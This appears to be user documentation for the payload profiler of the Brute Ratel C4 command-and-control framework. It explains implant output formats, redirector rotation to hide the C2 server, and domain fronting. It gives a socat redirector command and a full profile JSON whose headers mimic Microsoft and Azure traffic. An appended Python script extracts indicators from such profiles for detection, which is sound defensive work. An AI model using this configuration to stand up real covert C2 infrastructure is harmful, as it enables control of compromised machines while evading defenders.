Payload Profiler

C4 profiles provide a variety of options to configure and build payloads. These payload configurations can be quickly modified during offensive activities to either migrate to a different C4 server or inject a new payload into a new process on the go. There are 3 types of payload configurations:

  • HTTP/HTTPS
  • TCP
  • SMB

Payload Profiles via Brute Commander

The payloads can be configured to either make injectables, binaries or profilers to support fallback C2 channels. Each of the above 3 payload types can be configured to build an executable, shellcode in raw format (bin), shellcode in text format (hex), a DLL library which can be executed using rundll32, or a service executable. To add a new profile, select C4 Profiler->Payload Profiler in the Brute Commander and then select the ‘+’ icon in the Payload Profiler.

You can select between 3 options in the ‘Payload type’ field, i.e. HTTP, TCP or SMB. The ‘Config name’ field takes a unique name for your config. This name is used later if you want to inject this configuration with a payload into a remote process.

The ‘Host’ field is what we call Nomad C2. Nomad badger is another new feature of BRc4, introduced in version 0.3. This feature provides server rotation functionality. When the badger is executed on a host, it randomly selects one of the redirectors listed in the ‘Host’ field every time, instead of connecting to a constant C2 server. The redirectors can route all the traffic to your C2 server using something like socat or nginx. This way your original C4 server stays hidden, and you can host anywhere from 1 to 100 different redirectors, all of which are selected randomly during the badger’s communication. This is a great way to establish a connection to your server when you don’t know what categories are allowed by the victim’s proxy server and you have created multiple different servers with different categorization. A simple socat command to use as a redirector would be:

  socat TCP4-LISTEN:443,fork TCP4:your_c4_host_IP:443

The next option is the ‘Port’, which is the port your badger connects to. The ‘Host header’ is optional; it was built to support domain fronting. The ‘URI’ field is the path your badger connects to on your listener. The next field is ‘SSL’, which enables an SSL connection for your badger, followed by the authentication option for your C2 server’s authentication. The final option is ‘Extra Headers’. This field takes multiple headers in the form key:value, each separated by a comma and a newline, as can be seen in the image below. These headers can be added arbitrarily and do not affect the C2 server; they are only there to emulate specific POST requests such as Gmail/Amazon/Azure or anything else. Each header needs to be on a new line and must not contain any commas. Below is a quick example of an HTTP payload configuration.

Similarly, if you select ‘SMB’ in the Payload type, you have to fill in a Named Pipe.

And, if you select ‘TCP’ in the Payload type, you have to fill in just a host, port and the C2 authentication.

Finally, you can view them all in the same Payload Profiler option as below:

Payload Profiles via C4 Profilers

These configurations can also be added via C4 Profiles. The C4 profile for a payload can be seen below. You don’t necessarily have to write all of the content you see below: you can export the whole C4 profile once you’ve created it in the GUI and use it directly with the ‘-c’ command line option of the ratel server.

{
    "payload_config": {
        "main_http": {
            "c2_auth": "abcd@123",
            "c2_uri": [
                "content.php",
                "admin.php"
            ],
            "extra_headers": {
                "Cache-Control": "no-cache",
                "Connection": "close",
                "Cookie": "AUTH-1babbba6265ca2eba78b65bda5e34545c32a95b2; Version=default; id=a3fWa; Expires=Thu 31 Oct 2021 07:28:00 GMT;",
                "Pragma": "no-cache",
                "Referer": "https://mail.microsoft.com",
                "x-pm-apiversion": "3",
                "x-pm-appversion": "Web_3.16.33",
                "x-pm-uid": "d0e1f5b0dc08202064de25a",
                "Host": "test.azureedge.net"
            },
            "host": "10.10.10.1",
            "port": "443",
            "ssl": true,
            "type": "HTTP",
            "useragent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0"
        },
        "main_tcp": {
            "c2_auth": "abcd@123",
            "host": "127.0.0.1",
            "port": "10000",
            "type": "TCP"
        },
        "main_smb": {
            "c2_auth": "abcd@123",
            "smb_pipe": "\\\\.\\pipe\\mynamedpipe",
            "type": "SMB"
        }
    }
}
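Added example (not part of the BRc4 documentation or product): the Python below loads an exported profile of the shape shown above, checks each config for the fields the descriptions above require for its type plus the no-comma rule for Extra Headers, and collects the artefacts (host:port, URIs, User-Agent, Host header, named pipe) a defender would turn into detection content. The sample profile is constructed; handling a list-valued ‘host’ is an assumption, since the page shows only a single string.

```python
import json

# Constructed sample profile, shaped like the C4 profile shown on this page.
SAMPLE_PROFILE = json.loads(r'''{"payload_config": {
  "main_http": {"c2_auth": "abcd@123", "c2_uri": ["content.php", "admin.php"],
    "extra_headers": {"Host": "test.azureedge.net", "Referer": "https://mail.microsoft.com"},
    "host": "10.10.10.1", "port": "443", "ssl": true, "type": "HTTP",
    "useragent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0"},
  "main_tcp": {"c2_auth": "abcd@123", "host": "127.0.0.1", "port": "10000", "type": "TCP"},
  "main_smb": {"c2_auth": "abcd@123", "smb_pipe": "\\\\.\\pipe\\mynamedpipe", "type": "SMB"}}}''')

# Fields each payload type must carry, per the field descriptions above.
REQUIRED = {"HTTP": ("host", "port", "c2_uri", "ssl", "c2_auth"),
            "TCP": ("host", "port", "c2_auth"),
            "SMB": ("smb_pipe", "c2_auth")}

def validate_profile(profile):
    """Map each config name to its problems; an empty list means the config is complete."""
    problems = {}
    for name, cfg in profile.get("payload_config", {}).items():
        ptype = cfg.get("type")
        if ptype not in REQUIRED:
            errs = [f"unknown type {ptype!r}"]
        else:
            errs = [f"missing {f}" for f in REQUIRED[ptype] if f not in cfg]
        # The Extra Headers field takes one header per line and forbids commas in a header.
        for k, v in cfg.get("extra_headers", {}).items():
            if "," in k or "," in str(v):
                errs.append(f"header {k!r} contains a comma")
        problems[name] = errs
    return problems

def extract_indicators(profile):
    """Collect the artefacts in a profile that a detection engineer would hunt for."""
    ind = {"hosts": set(), "uris": set(), "user_agents": set(), "http_hosts": set(), "pipes": set()}
    for cfg in profile.get("payload_config", {}).values():
        ptype = cfg.get("type")
        if ptype in ("HTTP", "TCP") and "host" in cfg:
            # Assumption: a Nomad 'host' entry may be a list of redirectors as well as one string.
            hosts = cfg["host"] if isinstance(cfg["host"], list) else [cfg["host"]]
            ind["hosts"].update(f"{h}:{cfg.get('port', '?')}" for h in hosts)
        if ptype == "HTTP":
            ind["uris"].update(cfg.get("c2_uri", []))
            ind["user_agents"].add(cfg.get("useragent", ""))
            ind["http_hosts"].add(cfg.get("extra_headers", {}).get("Host", ""))
        if ptype == "SMB" and "smb_pipe" in cfg:
            ind["pipes"].add(cfg["smb_pipe"])
    return {k: v - {""} for k, v in ind.items()}  # drop empty placeholders
```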